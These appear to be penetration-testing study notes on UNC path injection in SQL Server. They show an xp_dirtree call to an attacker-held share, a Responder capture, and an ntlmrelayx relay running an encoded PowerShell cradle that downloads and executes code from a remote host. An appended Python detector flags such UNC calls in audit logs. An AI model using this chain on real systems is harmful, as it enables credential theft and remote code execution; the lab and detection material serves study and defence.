UNC Path Injection

Force a SQL Server to connect to an SMB share we control, so that the NTLM hash of its service account can be captured and either cracked offline or used for relaying -> NTLM Relaying

Query to execute on server:

EXEC master..xp_dirtree "\\192.168.119.120\test";

On Kali:

sudo responder -I tap0

!!!!(RESPONDER IS PROHIBITED DURING OSEP EXAM)!!!!

Example NTLM Relaying with UNC

pwsh
$text = "(New-Object System.Net.WebClient).DownloadString('http://192.168.45.242/run.txt') | IEX"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($text)
$EncodedText = [Convert]::ToBase64String($bytes)
$EncodedText

KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIANAAyAC8AcgB1AG4ALgB0AHgAdAAnACkAIAB8ACAASQBFAFgA

(host run.txt, the PowerShell runner, on the web server at 192.168.45.242 -> PowerShell Runners)

Start ntlmrelayx on Kali (in this case it is run through proxychains), relaying the SQL Server's authentication to the target and executing the encoded command there:

sudo proxychains impacket-ntlmrelayx --no-http-server -smb2support -t 172.16.229.152 -c 'powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIANAAyAC8AcgB1AG4ALgB0AHgAdAAnACkAIAB8ACAASQBFAFgA'
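As an added defensive example (not part of these notes), a small Python detector that scans SQL Server audit-style statement logs for the path-taking extended procedures used above being pointed at a UNC path, which is how a forced outbound SMB authentication from the service account appears at the query layer. The log line format, the sample hosts and the trusted-host list are constructed for the example.

```python
import re
from dataclasses import dataclass

# Extended stored procedures that take a path argument and make the SQL Server
# service account open it; a UNC path turns that into an outbound SMB connection
# authenticated with the account's NTLM credentials.
PATH_PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs")

# Matches e.g.  EXEC master..xp_dirtree "\\192.168.119.120\test"
UNC_CALL = re.compile(
    r"\b(?P<proc>" + "|".join(PATH_PROCS) + r")\s*"
    r"['\"]\\\\(?P<host>[^\\'\"]+)\\(?P<share>[^\\'\"]*)",
    re.IGNORECASE,
)
# Constructed audit-log layout used for this example: timestamp, login, db, statement.
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+login=(?P<login>\S+)\s+db=\S+\s+stmt=(?P<stmt>.*)$")


@dataclass
class Finding:
    ts: str
    login: str
    proc: str
    host: str
    share: str
    trusted: bool  # host is on the allowlist of known file servers


def find_unc_coercion(log_lines, trusted_hosts=()):
    """Return one Finding per statement that points a path-taking extended
    procedure at a UNC path. Findings with trusted=False are the ones to
    treat as possible hash capture / relay attempts."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a statement record
        call = UNC_CALL.search(m.group("stmt"))
        if not call:
            continue  # ordinary query, or a local path (no outbound SMB)
        host = call.group("host")
        findings.append(Finding(m.group("ts"), m.group("login"), call.group("proc").lower(),
                                host, call.group("share"), host.lower() in trusted))
    return findings


# Constructed sample log: one coercion to an untrusted host, one legitimate
# file-server check, one local path and one unrelated query.
SAMPLE_LOG = [
    r'2024-05-01T10:00:01Z login=webapp db=master stmt=EXEC master..xp_dirtree "\\192.168.119.120\test";',
    r"2024-05-01T10:00:02Z login=webapp db=app stmt=SELECT name FROM sys.tables;",
    r"2024-05-01T10:00:03Z login=svc_backup db=master stmt=exec xp_fileexist '\\fileserver.corp.local\backups\a.bak'",
    r"2024-05-01T10:00:04Z login=webapp db=master stmt=EXEC master..xp_dirtree 'C:\inetpub\wwwroot';",
]

if __name__ == "__main__":
    for f in find_unc_coercion(SAMPLE_LOG, trusted_hosts=["fileserver.corp.local"]):
        print(f"{'OK   ' if f.trusted else 'ALERT'} {f.ts} {f.login} {f.proc} -> \\\\{f.host}\\{f.share}")
```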
